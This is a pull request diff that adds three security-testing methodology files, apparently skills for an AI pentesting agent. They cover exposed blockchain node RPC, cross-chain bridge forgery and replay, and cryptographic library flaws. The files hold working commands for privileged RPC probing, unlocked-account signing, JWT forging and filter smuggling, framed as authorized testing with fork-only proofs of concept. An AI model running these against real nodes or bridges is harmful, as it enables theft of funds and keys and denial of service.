### PR TITLE
feat(skills): web3 asset methodology skills

### DIFF
--- a/strix/skills/web3/blockchain_node.md
+++ b/strix/skills/web3/blockchain_node.md
@@ -1,0 +1,173 @@
+---
+name: blockchain_node
+description: Testing blockchain node/client RPC exposure, admin-method abuse, peer/consensus interfaces, and key/wallet leakage
+---
+
+# Blockchain Node / Client
+
+A blockchain node (Geth, Erigon, Nethermind, Besu, Reth for EVM; Bitcoin Core; Solana, Cosmos/Tendermint, Substrate/Polkadot, Avalanche) is a network daemon that exposes JSON-RPC/WS APIs, a P2P/gossip layer, and often a metrics/admin plane. The attacker's objective is to reach an RPC or admin interface that was meant to be loopback-only, then pivot: drain hot-wallet funds via unlocked-account `eth_sendTransaction`, exfiltrate keys/mnemonics, abuse `admin`/`debug`/`miner`/`personal` namespaces, manipulate the peer set or consensus, or DoS the node. A single exposed `:8545` with a permissive `--http.api` is frequently a direct path to signed-transaction control.
+
+## Attack Surface
+
+**Scope**
+- JSON-RPC over HTTP (EVM `8545`, WS `8546`; Bitcoin `8332`; Solana `8899`; Cosmos `26657`/`1317`/`9090`; Substrate `9933`/`9944`)
+- WebSocket and IPC endpoints; GraphQL endpoint on Geth (`/graphql`, default `8547`)
+- P2P/gossip layer (devp2p/RLPx `30303`; Bitcoin `8333`; Tendermint `26656`; libp2p)
+- Engine API / consensus-execution link (`8551` + JWT `jwtsecret`)
+- Metrics/pprof/admin (`6060` Geth pprof, `6061` metrics, Prometheus exporters)
+- Validator/staking sidecars (Lighthouse/Prysm/Teku/Nimbus beacon + validator clients, key-manager API `5062`)
+
+**Privileged RPC namespaces (EVM)**
+- `personal` (`unlockAccount`, `sendTransaction`, `importRawKey`, `listAccounts`)
+- `admin` (`addPeer`, `peers`, `nodeInfo`, `startHTTP`, `startRPC`, datadir disclosure)
+- `debug`/`txpool`/`miner` (state dumps, `debug_traceTransaction`, `miner_setEtherbase`, `txpool_content`)
+- `eth_sendTransaction`/`eth_sign`/`eth_signTransaction` (only sign if an account is unlocked or keystore-backed)
+
+**Indirect sources**
+- Reverse proxies (nginx/traefik) that forward `/` to RPC without method allowlisting
+- Cloud node providers / load balancers fronting RPC with weak auth
+- CI/CD or IaC leaking `jwtsecret`, keystore files, mnemonics, RPC API keys
+
+## Recon & Enumeration
+
+```bash
+# Fast port sweep for common node ports
+naabu -host node.target.tld -p 8545,8546,8547,8551,8899,8332,8333,26656,26657,1317,9090,9933,9944,30303,6060,6061,9100 -silent
+nmap -sV -Pn -p 8545,8546,8547,8551,8899,8332,26657,30303 --version-intensity 5 node.target.tld
+
+# Probe RPC HTTP surfaces, capture titles/tech
+httpx -l targets.txt -ports 8545,8546,8547,8899,26657,1317,9933 -title -tech-detect -status-code -json -o httpx_rpc.json
+
+# Subdomain/infra discovery for hosted RPC gateways
+subfinder -d target.tld -silent | dnsx -silent | httpx -mc 200,401,403 -title
+
+# EVM node fingerprint + namespace probe (clientVersion is the tell)
+curl -s -X POST node.target.tld:8545 -H 'content-type: application/json' \
+  --data '{"jsonrpc":"2.0","id":1,"method":"web3_clientVersion","params":[]}'
+# -> "Geth/v1.13.x", "erigon/...", "Nethermind/...", "besu/..."
+
+# Tendermint/Cosmos status + open RPC
+curl -s node.target.tld:26657/status | jq '.result.node_info'
+curl -s node.target.tld:26657/net_info | jq '.result.n_peers'
+
+# Bitcoin Core (RPC requires basic auth; test default/weak creds carefully)
+curl -s --user user:pass --data-binary \
+  '{"jsonrpc":"1.0","id":1,"method":"getblockchaininfo","params":[]}' \
+  -H 'content-type: text/plain;' http://node.target.tld:8332/
+
+# Nuclei has exposed-RPC and node-misconfig templates
+nuclei -u http://node.target.tld:8545 -tags exposure,misconfig,blockchain,ethereum -s critical,high,medium -j -o nuclei_node.jsonl
+nuclei -l targets.txt -t http/misconfiguration/ -t http/exposures/ -tags rpc,jsonrpc -rl 30 -c 10 -bs 10 -j -o nuclei_rpc.jsonl
+
+# Secret hunting in node infra repos / configs (jwtsecret, keystores, mnemonics)
+trufflehog filesystem ./node-infra --only-verified
+gitleaks detect --source ./node-infra -v
+# grep node configs for exposed bind addresses + open APIs
+grep -rEn 'http\.addr|http\.api|ws\.api|--rpc|allow-unprotected-txs|0\.0\.0\.0' ./node-infra
+
+# Container image audit for baked-in keys / vulnerable client versions
+trivy image my/geth-node:latest --scanners vuln,secret
+syft my/geth-node:latest -o table   # then grype for the SBOM CVEs
+
+# Smart-contract tooling (when assessing contracts the node serves)
+pip install slither-analyzer mythril   # slither ./contracts ; myth analyze contract.sol
+```
+
+Install hints for asset-specific tooling not in the base image:
+- `npm i -g @ethersproject/cli` or use `cast` from Foundry (`curl -L https://foundry.paradigm.xyz | bash && foundryup`) — `cast rpc` is the cleanest RPC client.
+- `pip install web3` for scripted method fuzzing.
+
+## Methodology
+
+1. **Map exposure.** Confirm which ports answer from outside the host. RPC/admin ports binding `0.0.0.0` (not `127.0.0.1`) is the root issue; verify with an external `naabu`/`httpx` from the test host, not from the node itself.
+2. **Fingerprint the client + version.** `web3_clientVersion` / `getnetworkinfo` / `26657/status`. Map the exact version to known CVEs via `grype`/`nuclei`. Note chain ID (`eth_chainId`) — mainnet vs testnet sharply changes impact.
+3. **Enumerate enabled namespaces.** Send one probe per privileged method; a non-"method not found" response means the namespace is enabled. Prioritize `personal`, `admin`, `debug`, `miner`, `txpool`.
+4. **Test account/key exposure.** `eth_accounts` / `personal_listAccounts` / `eth_getBalance` per account. A funded, listed account on a node with `personal` enabled is the high-value target.
+5. **Test signing reachability.** Without unlocking, attempt `eth_sendTransaction` from a listed account — if it does not error with "authentication needed"/"account is locked", an account is already unlocked (drainable). Use a zero-value self-transaction to prove control.
+6. **Assess the consensus/engine link.** Check `8551` (Engine API): is it reachable without the `jwtsecret` HS256 token? Forge a JWT if the secret leaked.
+7. **Assess P2P/peer control.** `admin_addPeer`/`admin_removePeer`, eclipse/peer-flooding feasibility, Tendermint `dial_peers`.
+8. **Check metrics/pprof.** `6060/debug/pprof/` and Prometheus exporters leak goroutines, heap, peer info, and sometimes config/datadir paths.
+9. **Document, validate with minimal-impact PoC, and stop at proof.**
+
+## Key Weaknesses / Techniques
+
+**Unauthenticated RPC with privileged APIs**
+The classic: `geth --http --http.addr 0.0.0.0 --http.api eth,net,web3,personal,admin,debug`. Enumerate namespaces:
+```bash
+for m in personal_listAccounts admin_nodeInfo debug_traceBlock miner_start txpool_status; do
+  curl -s -X POST node.target.tld:8545 -H 'content-type: application/json' \
+    --data "{\"jsonrpc\":\"2.0\",\"id\":1,\"method\":\"$m\",\"params\":[]}" | jq -c "{m:\"$m\",r:.}";
+done
+```
+
+**Unlocked-account fund drain**
+If `personal` is enabled, the node may have an account unlocked via `--unlock` + `--password`. List, check balance, then prove signing control with a harmless self-send:
+```bash
+ACC=$(curl -s -X POST node.target.tld:8545 -H 'content-type: application/json' \
+  --data '{"jsonrpc":"2.0","id":1,"method":"eth_accounts","params":[]}' | jq -r '.result[0]')
+curl -s -X POST node.target.tld:8545 -H 'content-type: application/json' \
+  --data "{\"jsonrpc\":\"2.0\",\"id\":1,\"method\":\"eth_sendTransaction\",\"params\":[{\"from\":\"$ACC\",\"to\":\"$ACC\",\"value\":\"0x0\"}]}"
+```
+A returned tx hash (instead of a "locked"/"auth" error) proves arbitrary signing; do NOT move funds to an external address — the zero-value self-send is sufficient PoC.
+
+**Key import / private-key recovery**
+`personal_importRawKey`, keystore files in the datadir (disclosed via `admin_datadir`/pprof), or mnemonics in leaked configs. `trufflehog`/`gitleaks` on infra repos; check `~/.ethereum/keystore`, `wallet.dat`, `validator_keys/`.
+
+**Engine API / JWT consensus link**
+The execution-consensus link on `8551` uses an HS256 JWT signed with a 32-byte `jwtsecret`. If the secret leaks (common in shared volumes/IaC), forge a token and drive `engine_*`:
+```bash
+jwt_tool -S hs256 -k jwtsecret.hex -p '{"iat":'"$(date +%s)"'}' ''   # craft token, then auth Bearer to :8551
+```
+Test default/predictable secrets and world-readable `jwtsecret` files.
+
+**Debug-namespace state and DoS**
+`debug_traceTransaction`/`debug_traceBlockByNumber` with full tracers, `debug_dumpBlock`, and `eth_getLogs` with `fromBlock:0,toBlock:latest` are heavy — a single request can OOM or stall the node (request-amplification DoS). Validate cost with a single bounded call; never run a sustained flood.
+
+**P2P / consensus manipulation**
+`admin_addPeer` to inject malicious peers; eclipse attempts via peer-table flooding; Tendermint `26657/dial_peers`. On PoS sidecars, probe the validator key-manager API (`5062`) for unauthenticated key listing/import (slashing risk).
+
+**Allow-unprotected-txs & chain confusion**
+`--rpc.allow-unprotected-txs` (pre-EIP-155) enables cross-chain replay. Verify `eth_chainId` and whether legacy txs are accepted.
+
+**Proxy method-filter bypass**
+RPC behind nginx often allowlists by method string. Test JSON batch arrays, namespace casing, whitespace, and duplicate keys to smuggle blocked methods past naive filters.
+
+## Validation
+
+1. Prove external reachability of an interface intended to be loopback (capture the response from the test host, record source IP).
+2. Prove privileged-namespace enablement with a benign read (`admin_nodeInfo`, `txpool_status`) — capture the JSON.
+3. For signing control, use a **zero-value self-transaction** and show the returned tx hash; do not transfer value externally.
+4. For Engine API/JWT, show a successful authenticated `engine_*`/`eth_*` call with a forged token, not just a 401-vs-200 diff.
+5. For key exposure, show the file path/permissions or a redacted key prefix — never paste full private keys/mnemonics into reports.
+6. Capture client + exact version to tie any CVE-based finding to a fixed-in release.
+
+## False Positives
+
+- A node bound to `127.0.0.1` that only answers from on-host — confirm from an external interface before reporting.
+- Public read-only RPC providers (Infura/Alchemy-style) that intentionally expose `eth_call`/`eth_getBalance` but block `personal`/`admin` — exposure of safe namespaces is by design.
+- "method not found" / "the method X does not exist" means the namespace is disabled — not a finding.
+- Testnet/devnet nodes with worthless funds (check `eth_chainId`; e.g. Sepolia `0xaa36a7`) — note reduced impact.
+- `eth_sendTransaction` returning "authentication needed: password or unlock" — signing is NOT reachable; this is correct behavior.
+- 401/403 from an auth-gated RPC proxy where credentials are unknown — exposure without auth bypass is informational.
+
+## Chaining & Impact
+
+- Open RPC + `personal` + unlocked account -> direct hot-wallet drain (critical, monetary loss).
+- Leaked `jwtsecret` -> forged Engine API auth -> influence block production / liveness on a validator.
+- pprof/`admin_datadir` -> keystore path disclosure -> offline keystore crack (`hashcat`) -> key recovery.
+- Heavy `debug_*`/`eth_getLogs` -> node DoS -> if it's a validator, missed attestations/slashing or chain liveness impact.
+- RPC info leak (`admin_nodeInfo` enode, peer IPs) -> targeted P2P eclipse -> double-spend/censorship feasibility.
+- Validator key-manager API unauth -> key extraction/import -> slashing and stake loss.
+- Secret in infra repo (`trufflehog`) -> RPC API key / cloud node-provider key -> broader account takeover.
+
+## Pro Tips
+
+1. `web3_clientVersion` is your fastest fingerprint and CVE pivot — always grab it first, then `grype` the version.
+2. The single highest-value misconfig is `--http.addr 0.0.0.0` combined with `personal` in `--http.api`; grep configs for both.
+3. WS (`8546`) frequently has a different/looser API set than HTTP (`8545`) — enumerate both independently.
+4. Use JSON-RPC **batch arrays** to probe many methods in one request and to test proxy filter bypasses.
+5. Geth's `/graphql` endpoint can expose state even when JSON-RPC is filtered — check it separately.
+6. For PoC restraint, prefer reads and zero-value self-sends; tracing/log-range calls can crash production nodes, so cap them at one bounded request.
+7. `jwtsecret` files are often world-readable on shared Docker volumes — check perms before assuming auth holds.
+8. Tendermint/Cosmos `26657` is unauthenticated by design; the risk is `broadcast_tx`/`dial_peers` and info leak, not "no auth" alone.
+9. Correlate `eth_chainId` to mainnet before escalating impact claims — testnet exposure is real but lower severity.

--- a/strix/skills/web3/cross_chain_bridge.md
+++ b/strix/skills/web3/cross_chain_bridge.md
@@ -1,0 +1,133 @@
+---
+name: cross_chain_bridge
+description: Assessing cross-chain bridges — message verification, replay protection, and custody logic across source/destination chains and relayers.
+---
+
+# Bridge / Cross-chain
+
+A cross-chain bridge moves value or messages between chains by locking/burning on a source chain and minting/releasing on a destination chain. Trust is split across on-chain contracts (vault/escrow, mint gateway, message verifier), an off-chain relayer/validator/oracle set, and a message format that both sides must agree on. The attacker's objective is to make the destination chain accept a withdrawal or mint that the source chain never authorized — by forging a message, replaying a valid one, or breaking the custody invariant `minted == locked`. Bridges hold pooled custody, so a single accepted forgery often drains the entire vault.
+
+## Attack Surface
+
+**On-chain (per chain)**
+- Source: `deposit`/`lock`/`burn`/`sendMessage` entry points; emitted event is the canonical message.
+- Destination: `withdraw`/`mint`/`executeMessage`/`receiveMessage`; verifies a proof or quorum signature, then pays out.
+- Verifier internals: Merkle/MPT proof checker, light-client header store, threshold-signature (ECDSA/BLS) check, guardian/validator set registry.
+- Privileged surface: `setValidatorSet`, `pause`/`unpause`, fee/limit setters, upgrade proxy admin, owner/multisig.
+
+**Off-chain**
+- Relayer/validator/oracle REST and RPC endpoints; signing service; quorum aggregation API.
+- Indexers and message-status APIs (`/message/:hash`, `/proof/:id`) that expose nonces, signatures, and pending withdrawals.
+
+**The message itself**
+- Encoded tuple: `(srcChainId, dstChainId, nonce, sender, recipient, token, amount, payload)`. Every field is an injection point if not bound into the signed/proven digest.
+
+## Recon & Enumeration
+
+Pull and review the verified source first; on-chain logic is the real attack surface.
+```
+# Contract source + ABI from explorer (Etherscan-family). Repeat per chain.
+curl -s "https://api.etherscan.io/api?module=contract&action=getsourcecode&address=$BRIDGE&apikey=$KEY" -o src.json
+# Identify proxy + implementation
+cast implementation $BRIDGE --rpc-url $RPC          # foundry; EIP-1967 slot read
+cast storage $BRIDGE 0x360894...bbc  --rpc-url $RPC # admin slot
+```
+Static analysis on the Solidity (install if absent):
+```
+pipx install slither-analyzer mythril
+slither . --print human-summary --print modifiers
+slither . --detect arbitrary-send,reentrancy-eth,unchecked-lowlevel,unprotected-upgrade
+myth analyze contracts/Bridge.sol --solv 0.8.20 -t 3
+semgrep --config p/smart-contracts --config p/solidity .
+```
+Map the off-chain relayer/API fleet:
+```
+subfinder -d bridge.example -all -silent | httpx -silent -title -tech-detect -json -o hosts.json
+naabu -host relayer.bridge.example -top-ports 1000 -silent | httpx -silent
+katana -u https://relayer.bridge.example -jc -d 3 -o endpoints.txt
+ffuf -u https://relayer.bridge.example/FUZZ -w api-words.txt -mc 200,401,403
+nuclei -l hosts.txt -as -s critical,high -rl 50 -c 20 -j -o nuclei.jsonl
+```
+Hunt for leaked validator/relayer keys and config (a bridge's nightmare):
+```
+trufflehog filesystem ./bridge-repo --only-verified
+gitleaks detect -s ./bridge-repo -v
+# Scan relayer container images for embedded keys / known CVEs
+trivy image bridgeorg/relayer:latest
+```
+Query live on-chain state to learn the verifier model:
+```
+cast call $BRIDGE "validators()(address[])" --rpc-url $RPC
+cast call $BRIDGE "threshold()(uint256)" --rpc-url $RPC
+cast call $BRIDGE "processedNonces(uint256)(bool)" 42 --rpc-url $RPC
+cast logs --address $BRIDGE "MessageSent(uint256,bytes32,bytes)" --rpc-url $RPC
+```
+
+## Methodology
+
+1. Enumerate both legs. Identify the source emit and destination accept functions, and the exact verification path between them (proof, light client, or quorum signatures).
+2. Reconstruct the canonical message format and the digest that is actually signed/proven. Diff it against the fields the destination uses to pay out — any field used for payout but absent from the digest is forgeable.
+3. Map replay-protection state: where nonces/message hashes are recorded as consumed, the scope of that record (per-chain? global? per-token?), and the order of the consume-vs-pay operations.
+4. Verify custody accounting: confirm `mint`/`release` is gated by a corresponding lock/burn and that supply on the destination cannot exceed collateral on the source.
+5. Inspect the validator/guardian set: how it is rotated, who can rotate it, default/zero-address handling, and quorum math.
+6. Probe the off-chain relayer/signer for input validation, auth, and key exposure that lets you obtain a valid signature over an attacker-chosen message.
+7. Test privileged and upgrade paths for missing access control.
+8. Build a PoC on a fork before touching anything live.
+
+## Key Weaknesses / Techniques
+
+**Forged / unverified messages.** Destination accepts a message whose proof or signature does not actually bind all payout fields. Classic: signature recovered over `keccak256(amount, recipient)` but payout also reads `token` and `srcChainId` from calldata. Re-encode with a different token/recipient and the same signature still verifies. Validate by recovering the signer from the on-chain digest and comparing to the fields used downstream.
+```
+# Recompute what the contract hashes vs what it spends:
+cast keccak $(cast abi-encode "f(uint256,address,uint256)" 1 $RECIP 1000)
+cast call $BRIDGE "recover(bytes32,bytes)(address)" $DIGEST $SIG --rpc-url $RPC
+```
+**Missing / weak replay protection.** Nonce or message hash not marked consumed, marked after payout (reentrancy window), or scoped too narrowly so the same message replays on a sibling chain. Test by submitting an already-processed withdrawal twice on a fork.
+```
+cast send $BRIDGE "executeMessage(bytes,bytes)" $MSG $PROOF --rpc-url $FORK
+cast send $BRIDGE "executeMessage(bytes,bytes)" $MSG $PROOF --rpc-url $FORK  # second must revert
+```
+**Cross-domain / chain-id confusion.** `dstChainId` not checked, so a message destined for chain B is accepted on chain C; or the same verifier contract deployed on multiple chains shares a nonce space, enabling cross-chain replay.
+**Custody invariant break.** Mint path callable without a matching lock, or burn/lock can be reverted/re-entered after the destination already minted, yielding `minted > locked`. Look for missing reentrancy guards on `lock`→external-call→state-update sequences (`slither --detect reentrancy-eth`).
+**Merkle / MPT proof flaws.** Second-preimage on unbalanced trees, missing leaf/internal-node domain separation, accepting a proof of an intermediate node as a leaf, or not binding the proof to the correct state/receipt root. Construct a forged proof against a captured root and submit it.
+**Light-client / header forgery.** Insufficient validator-signature checks on submitted headers, accepting headers without finality, or epoch/validator-set transition gaps. Submit a self-signed header with an attacker-controlled validator set.
+**Validator-set takeover.** `updateValidatorSet` missing access control, accepting an empty set (threshold then trivially met), or signature malleability/duplicate-signer counting that inflates quorum.
+**Off-chain signer abuse.** Relayer signs whatever message its API is handed without verifying source-chain inclusion, or SSRF/SQLi in the indexer leaks pending signatures. (See ssrf / sqlmap skills for the web legs.)
+
+## Validation
+
+1. Fork the destination chain at current head: `anvil --fork-url $RPC --fork-block-number latest`.
+2. Reproduce the exact forged/replayed call against the fork and show value leaving the vault to an attacker-controlled address.
+3. For forgery, demonstrate the destination accepts a message that no source-chain `lock`/`burn` event backs — prove the absence of the corresponding source event.
+4. For replay, show a second `execute`/`withdraw` of one valid message succeeds (or document the precise nonce/hash state that fails to update).
+5. Quantify drainable amount: vault balance reachable per forged message and per block.
+6. Capture the full PoC (Foundry test or script) and the on-chain tx trace (`cast run $TX --rpc-url $FORK`) so the finding is reproducible without your environment.
+
+## False Positives
+
+- Signature/proof verifies but a separate, correct check (chain-id, nonce, recipient binding) blocks payout — read the whole `require` chain before claiming forgery.
+- Replay "succeeds" on a fork only because you reset state between calls; re-run against persistent fork state.
+- Privileged function looks open but is behind a timelock/multisig you don't control — note as governance risk, not direct exploit.
+- "Missing" event on source is actually emitted under a different signature/contract — confirm with full log search across the bridge's contracts.
+- Testnet/mock verifier (e.g. `acceptAll` stub) in a non-production deployment.
+- OAST/relayer callback whose source IP is your own client, not the bridge backend.
+
+## Chaining & Impact
+
+- Forged message or broken custody invariant → mint/withdraw without backing → full vault drain across pooled tokens.
+- Leaked validator key (trufflehog/gitleaks) → produce a valid quorum signature → forge any message at will.
+- Validator-set takeover → permanent control of all future withdrawals.
+- SSRF/SQLi on the indexer → harvest pending signatures/nonces → assemble replay or front-run legitimate withdrawals.
+- Unprotected upgrade/proxy admin → replace verifier with an `acceptAll` implementation → drain at leisure.
+- Wrapped-asset depeg: an over-mint propagates insolvency to every DEX pool and lending market holding the bridged token.
+
+## Pro Tips
+
+- Read the digest, not the docstring. The only thing that matters is which bytes the on-chain verifier hashes and recovers over; everything outside that tuple is attacker-controlled.
+- Bridges are symmetric — audit both directions; the lock side and the mint side are often written by different people with different assumptions.
+- Check operation ordering: consume-nonce-then-pay vs pay-then-consume is the difference between safe and reentrant.
+- The same contract on N chains usually means one nonce space; test cross-chain replay explicitly.
+- Validator-set rotation and epoch boundaries are where light clients break — focus on the transition logic, not steady state.
+- Count signatures by unique recovered address, not by array length; duplicate-signer and `ecrecover` zero-address returns are common quorum bypasses.
+- Always reproduce on a forked mainnet with real state before reporting; bridge logic is too stateful to reason about statically alone.
+- Favor read-only confirmation (event absence, recovered signer, supply vs collateral) over live exploitation when assessing production custody.

--- a/strix/skills/web3/crypto_library.md
+++ b/strix/skills/web3/crypto_library.md
@@ -1,0 +1,157 @@
+---
+name: crypto_library
+description: Authorized review of cryptographic libraries — primitives, randomness, constant-time guarantees, and key handling.
+---
+
+# Cryptographic Library
+
+A cryptographic library is the code that other software trusts to keep secrets: it implements ciphers, hashes, MACs, signatures, key exchange, RNGs, and key/serialization plumbing (PEM/DER, JWK, keystores). Because callers cannot easily tell whether the math is correct, a subtle defect — a non-constant-time comparison, a reused nonce, a predictable RNG, a skipped signature check — silently destroys the guarantee while every test still passes. The attacker's objective is to find the gap between what the API promises and what the implementation actually does, then turn it into key recovery, forgery, decryption, or authentication bypass.
+
+## Attack Surface
+
+**Public API**
+- Encrypt/decrypt, sign/verify, MAC, KDF, key generation, key import/export
+- AEAD wrappers, hybrid encryption, password hashing, token (JWT/PASETO/COSE) helpers
+- "Easy"/"box" convenience APIs that hide nonce, IV, or padding handling from callers
+
+**Primitive implementations**
+- Block/stream ciphers, GCM/CCM/Poly1305, ECDSA/EdDSA/RSA, ECDH/X25519, hashes/XOFs
+- Bignum/field arithmetic, modular inversion, point multiplication (scalar handling)
+
+**Trust boundaries**
+- Parsers for ASN.1/DER, PEM, X.509, JWK, PKCS#8/#12 — pre-key-validation attacker input
+- Randomness source (OS CSPRNG, userspace PRNG, seeding, fork/VM-clone safety)
+- FFI/bindings to native code; build flags that toggle hardening or assembly paths
+- Side channels: timing, cache, branch, error-message and padding oracles, power (out of scope but noted)
+
+## Recon & Enumeration
+
+Treat the library as source-first. Most high-impact bugs are read off the code, not fuzzed out.
+
+```bash
+# Inventory the codebase, languages, and crypto deps
+syft dir:./target -o table                 # SBOM of bundled crypto deps
+grep -rIn -E "(MD5|SHA1|DES|RC4|ECB|PKCS1v15|Random\(|math/rand|ssl3|TLS1\.0)" target/
+
+# Known-CVE / outdated-primitive scan against the dependency tree
+grype dir:./target -o table
+trivy fs --scanners vuln,secret target/
+
+# Hardcoded keys, test vectors left as defaults, leaked private keys
+trufflehog filesystem target/ --results=verified,unknown
+gitleaks detect --source target/ --no-banner
+
+# Semgrep crypto rulepacks (constant-time, weak rng, static IV, etc.)
+semgrep --config p/r2c-security-audit --config p/crypto target/
+semgrep --config p/insecure-transport target/
+
+# If a Solidity/EVM crypto lib (precompiles, BLS, ecrecover wrappers):
+pipx install slither-analyzer && slither . --detect weak-prng,suicidal,unchecked-lowlevel
+pipx install mythril && myth analyze contracts/*.sol
+
+# Compiled / native artifact: confirm hardening and assembly path actually shipped
+binwalk -e libcrypto.so
+checksec --file=libcrypto.so          # NX/RELRO/stack canary
+nm -D libcrypto.so | grep -iE "memcmp|rand|ct_"
+```
+
+For a network-exposed service that wraps the library (KMS, signing oracle, token service):
+
+```bash
+naabu -host api.target.tld -top-ports 1000 -silent | httpx -silent -title -tech-detect
+nuclei -u https://api.target.tld -tags jwt,ssl,exposure -s critical,high -silent -j -o crypto_svc.jsonl
+jwt_tool <token> -M pb                  # probe alg confusion / weak secrets on issued tokens
+katana -u https://api.target.tld -jc | ffuf -w - -u FUZZ   # map signing/decrypt/verify endpoints
+```
+
+## Methodology
+
+1. **Map the promise.** Read the public API and docs. For each function note the security claim (confidential? authenticated? deterministic? constant-time?) and the secret it touches. These claims are your test oracles.
+2. **Trace every secret.** Follow keys/nonces/IVs/seeds from generation through use to zeroization. Flag any value that is logged, copied without wipe, or exported in cleartext.
+3. **Audit the RNG.** Identify the entropy source for keys, nonces, salts, and blinding. Verify it is the OS CSPRNG, properly seeded, and reseeded across `fork()`/snapshot.
+4. **Check primitive parameters.** Nonce/IV uniqueness, GCM nonce length (96-bit), CTR counter reuse, RSA padding (OAEP vs PKCS#1v1.5), curve/point validation, key-size minimums.
+5. **Hunt non-constant-time paths.** Tag comparisons, table lookups, and branches that depend on secret bytes (HMAC/tag compare, padding check, scalar bits, PIN/secret equality).
+6. **Stress the parsers.** Feed malformed DER/PEM/JWK/X.509 to the import path before any key check runs; look for confusion, panics, or downgrade.
+7. **Probe verification logic.** Confirm sign/verify and MAC actually reject tampered input; look for skipped checks, truncated tags, `alg:none`, and type confusion.
+8. **Reproduce with vectors.** Build a minimal harness using official test vectors (NIST CAVP, Wycheproof) to prove correct vs. broken behavior deterministically.
+9. **Escalate.** Convert each defect into the strongest concrete impact (forgery, key recovery, plaintext recovery) with a self-contained PoC.
+
+## Key Weaknesses / Techniques
+
+**Non-constant-time comparison (tag/MAC/secret).** A `==`, `memcmp`, or short-circuit string compare on a secret leaks position of the first mismatch via timing.
+```bash
+grep -rIn -E "memcmp\(|== *(mac|tag|sig|hmac|digest)|String\.equals|secrets\.compare_digest" target/
+```
+Validate timing dependence by measuring response time across many trials per guessed byte; correct code uses a branch-free `ct_compare`/`crypto.timingSafeEqual`/`hmac.compare_digest`.
+
+**Nonce / IV reuse.** GCM/ChaCha20-Poly1305 nonce reuse under one key leaks the auth key (forgery) and XORs plaintexts. CTR/CBC static IV breaks confidentiality.
+```bash
+grep -rIn -E "iv *= *(b?\"|\[0|new byte\[)|nonce *= *0|static.*[Ii][Vv]" target/
+```
+Verify by encrypting two messages and checking the emitted nonce; identical nonce on distinct calls under the same key is a finding.
+
+**Weak / predictable randomness.** Keys or nonces from `math/rand`, `java.util.Random`, `rand()`, time-seeded PRNGs, or unseeded userspace generators are recoverable.
+```bash
+grep -rIn -E "math/rand|java\.util\.Random|Math\.random|srand\(|new Random\(" target/
+```
+PoC: collect several outputs, recover internal state / seed, predict the next key or nonce.
+
+**Padding / error oracles.** PKCS#1v1.5 (Bleichenbacher), CBC-PAD (Vaudenay), and AEAD that distinguishes "bad pad" from "bad MAC" enable adaptive decryption/forgery.
+- Distinguishable error or timing between padding failure and MAC failure → oracle. Replay ciphertexts with flipped bytes and diff responses/latency.
+
+**Signature verification flaws.**
+- JWT `alg:none` or RS256→HS256 confusion (public key used as HMAC secret): `jwt_tool <tok> -X a` and `-X k -pk public.pem`.
+- ECDSA: missing low-`s` check (malleability), accepting `r=0`/`s=0`, or non-deterministic nonce with biased bits → lattice key recovery.
+- RSA: ignoring trailing bytes after the hash in PKCS#1v1.5 (BERserk/e=3 forgery); verify the parser is strict.
+
+**Missing key/point validation.** No curve membership check enables invalid-curve attacks; small-subgroup/order checks missing on ECDH; RSA with tiny `e` or unverified CRT params.
+
+**Key lifecycle defects.** Keys logged, serialized to disk unencrypted, kept in GC'd immutable strings (no wipe), exported via a debug endpoint, or default/test keys shipped.
+```bash
+grep -rIn -E "log.*key|print.*(priv|secret)|toString\(\).*key|BEGIN (RSA |EC )?PRIVATE" target/
+trufflehog filesystem target/ --results=verified,unknown
+```
+
+**Downgrade / algorithm negotiation.** Library honors attacker-chosen weak cipher/hash, or falls back to MD5/SHA-1/DES/RC4/export ciphers.
+
+## Validation
+
+1. **Build a deterministic harness.** Pull Project Wycheproof and NIST CAVP vectors; run the library against them. A vector the library accepts-but-should-reject (or vice versa) is a confirmed, reproducible bug — far stronger than a heuristic match.
+2. **Demonstrate the concrete primitive break:**
+   - Constant-time: a statistically significant timing gradient correlated with secret bytes (report trial count and the recovered byte).
+   - Nonce reuse: two ciphertexts with identical nonce under one key, plus the XOR/forgery they enable.
+   - Weak RNG: predict the next key/nonce from prior outputs.
+   - Signature: a forged token/signature the verifier accepts (e.g., a JWT minted via alg confusion that authenticates as another user in a test account).
+3. **Self-contained PoC.** Provide a small script + exact inputs/outputs so a maintainer can reproduce without your environment.
+4. **Bound the blast radius.** State which keys, sessions, or messages are affected and under what attacker position (chosen-ciphertext, network, co-resident).
+
+## False Positives
+
+- A flagged `memcmp` on **public** data (ciphertext, public key, non-secret length) — only secret-dependent comparisons matter.
+- MD5/SHA-1 used for non-security purposes (checksums, cache keys, ETags, dedup) — confirm it is not authenticating or signing.
+- "Static IV" that is actually a per-message random value assigned just before use, or a deterministic nonce scheme (SIV/AES-GCM-SIV) designed for reuse resistance.
+- `math/rand` used for jitter, backoff, or test fixtures rather than key/nonce/salt material.
+- ECB/PKCS#1v1.5 present only in legacy/compat code paths that are unreachable from the public API or gated off by default.
+- Timing differences swamped by network noise or GC pauses — without controlled measurement it is not a finding.
+- Semgrep/grype hits on a vendored dependency that is never built or linked into the shipped artifact (confirm with `syft`/`nm`).
+
+## Chaining & Impact
+
+- Non-constant-time tag compare → remote MAC forgery → authenticated-channel bypass or session token forgery.
+- Predictable RNG → recover signing/session key → impersonate any user, mint valid tokens, decrypt past traffic (no forward secrecy).
+- Nonce reuse in AEAD → recover Poly1305/GHASH key → forge arbitrary authenticated ciphertexts → tamper with encrypted commands.
+- Padding oracle on a decryption endpoint → full plaintext recovery of stored secrets / session cookies without ever touching the key.
+- ECDSA nonce bias across many signatures → lattice attack → private key recovery → total compromise (code signing, TLS, blockchain wallet drain).
+- alg-confusion / `alg:none` in the JWT helper → forge admin tokens → full authn bypass of every service trusting the issuer.
+- Unencrypted key export / key in logs → direct private-key theft → decrypt everything and sign as the victim indefinitely.
+
+## Pro Tips
+
+1. The bug is usually in the *glue*, not the cipher core — nonce management, parser, error handling, and the convenience API are where guarantees leak.
+2. Always run Wycheproof: it encodes the exact edge cases (point at infinity, `s=0`, oversized DER, special curve points) that hand-written tests miss.
+3. Constant-time claims are about the **binary**, not the source — compilers and `-O2` reintroduce branches. Inspect the emitted assembly or use `dudect`/`ctgrind` rather than trusting comments.
+4. Check `fork()`/snapshot/VM-clone behavior of the RNG; cloud auto-scaling and container forking are a real-world source of duplicated nonces.
+5. For signing oracles, deterministic nonces (RFC 6979/EdDSA) eliminate a whole bug class — flag any ECDSA path that does not use them.
+6. Error messages and HTTP status/timing are oracles even when the crypto is "correct" — uniform failure handling is part of the security claim.
